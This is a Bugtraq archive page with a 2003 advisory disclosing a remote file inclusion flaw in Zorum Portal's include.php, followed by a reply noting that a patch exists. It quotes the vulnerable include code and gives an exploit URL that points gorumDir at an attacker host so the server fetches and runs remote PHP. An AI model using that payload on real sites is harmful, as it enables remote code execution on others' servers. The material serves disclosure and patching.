Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: Zorum Portal (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 26 Jan 2003 20:03:49 +0100
A patch has been created for this hole and can be found on http://www.phpsecure.org/. 







From: MGhz <magas () mail lt>
To: bugtraq () securityfocus com
Subject: Zorum Portal  (PHP)
Date: 22 Jan 2003 19:45:26 -0000



Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
---------------------------------
include.php
---------------------------------

PHP Code:
---------------------------------
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
---------------------------------

--
magas () mail lt



_________________________________________________________________

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]